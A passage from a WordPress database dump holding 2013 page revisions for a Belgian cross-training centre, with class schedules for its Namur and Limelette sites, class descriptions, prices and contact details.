(379, 1, '2013-11-04 17:41:06', '2013-11-04 17:41:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:41:06', '2013-11-04 17:41:06', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(380, 1, '2013-11-04 17:41:46', '2013-11-04 17:41:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:41:46', '2013-11-04 17:41:46', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(381, 1, '2013-11-04 17:42:21', '2013-11-04 17:42:21', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2013-11-04 17:42:21', '2013-11-04 17:42:21', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(385, 1, '2013-11-04 17:48:51', '2013-11-04 17:48:51', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-11-04 17:48:51', '2013-11-04 17:48:51', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0),
(382, 1, '2013-11-04 17:45:12', '2013-11-04 17:45:12', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<div id=\"rdv\"></div>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-11-04 17:45:12', '2013-11-04 17:45:12', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(384, 1, '2013-11-04 17:47:17', '2013-11-04 17:47:17', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:47:17', '2013-11-04 17:47:17', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(383, 1, '2013-11-04 17:46:22', '2013-11-04 17:46:22', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9#rdv\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9#rdv\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9#rdv\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:46:22', '2013-11-04 17:46:22', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
